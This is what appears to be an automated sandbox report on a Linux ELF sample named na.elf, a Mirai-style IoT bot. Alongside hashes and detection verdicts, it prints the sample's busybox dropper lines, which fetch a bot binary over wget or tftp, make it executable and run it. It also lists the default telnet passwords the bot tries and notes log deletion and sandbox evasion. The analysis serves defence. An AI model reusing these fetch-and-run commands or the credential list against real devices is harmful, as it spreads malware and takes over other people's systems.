Linux Analysis Report
na.elf

ID:	1530606
Product:	CloudBasic
Start time:	10:31:45
Start date:	10.10.2024
Sample:	na.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	2b0caf52e5e7d8967ce6ad262f194966
SHA1:	71cef25f6bc45bdecd8ba77ec5c18a7795cc4bd4
SHA256:	26a240e366d95b7fd6b58e1ac79304334b30a910415a224c31f585f7b49cfaa2
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Name	Type	MD5	SHA1	SHA256

AV Detection

Source: na.elf

Avira: detected

Source: na.elf

ReversingLabs: Detection: 28%

Spreading

Source: na.elf	String: ash|login|wget|curl|tftp|ntpdate
Source: na.elf	String: '/proc//exe|ash|login|wget|curl|tftp|ntpdate/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin/

Networking

Source: /tmp/na.elf (PID: 6270)

Socket: 127.0.0.1:1234

Jump to behavior

Source: na.elf

String found in binary or memory: http://%d.%d.%d.%d/la.bot.%s

System Summary

Source: Initial sample	String containing 'busybox' found: /bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
Source: Initial sample	String containing 'busybox' found: /bin/busybox BOT
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
Source: Initial sample	String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox BOT
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
Source: Initial sample	String containing 'busybox' found: /bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet/bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t\x%02xsh
Source: Initial sample	String containing 'busybox' found: /bin/busybox BOTbuf = %s
Source: Initial sample	String containing 'busybox' found: >%st && cd %s && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample	String containing 'busybox' found: armx86_64mipsmipselsuperhpowerpcsparcget: applet not foundftp: applet not foundcho: applet not found>>>/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample	String containing 'busybox' found: retrieve/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'

Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: 12345678
Source: Initial sample	String containing potential weak password found: 654321
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: administrator

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal72.troj.evad.linELF@0/0@0/0

Data Obfuscation

Source: /tmp/na.elf (PID: 6276)

File: /etc/config

Jump to behavior

Persistence and Installation Behavior

Source: /tmp/na.elf (PID: 6276)	Directory: /root/.cache			Jump to behavior
Source: /tmp/na.elf (PID: 6276)	Directory: /root/.ssh			Jump to behavior
Source: /tmp/na.elf (PID: 6276)	Directory: /root/.config			Jump to behavior
Source: /tmp/na.elf (PID: 6276)	Directory: /root/.local			Jump to behavior
Source: /tmp/na.elf (PID: 6276)	Directory: /tmp/.X11-unix			Jump to behavior
Source: /tmp/na.elf (PID: 6276)	Directory: /tmp/.Test-unix			Jump to behavior
Source: /tmp/na.elf (PID: 6276)	Directory: /tmp/.font-unix			Jump to behavior
Source: /tmp/na.elf (PID: 6276)	Directory: /tmp/.ICE-unix			Jump to behavior
Source: /tmp/na.elf (PID: 6276)	Directory: /tmp/.XIM-unix			Jump to behavior
Source: /tmp/na.elf (PID: 6276)	Directory: /etc/.java			Jump to behavior

Source: /usr/bin/dash (PID: 6240)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.tZjZy5SILM /tmp/tmp.JTu1nCT417 /tmp/tmp.9lBcOe8jxo			Jump to behavior
Source: /usr/bin/dash (PID: 6241)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.tZjZy5SILM /tmp/tmp.JTu1nCT417 /tmp/tmp.9lBcOe8jxo			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: /tmp/na.elf (PID: 6276)

Log files deleted: /var/log/kern.log

Jump to behavior

Malware Analysis System Evasion

Source: /tmp/na.elf (PID: 6270)

Queries kernel information via 'uname':

Jump to behavior

Source: na.elf, 6270.1.000055dec9d45000.000055dec9ded000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: na.elf, 6270.1.00007ffcbf9cc000.00007ffcbf9ed000.rw-.sdmp	Binary or memory string: ;dx86_64/usr/bin/qemu-mipsel/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
Source: na.elf, 6270.1.000055dec9d45000.000055dec9ded000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: na.elf, 6270.1.00007ffcbf9cc000.00007ffcbf9ed000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 6270.1.00007f25e0400000.00007f25e0419000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 6270.1.00007f25e0400000.00007f25e0419000.r-x.sdmp, type: MEMORY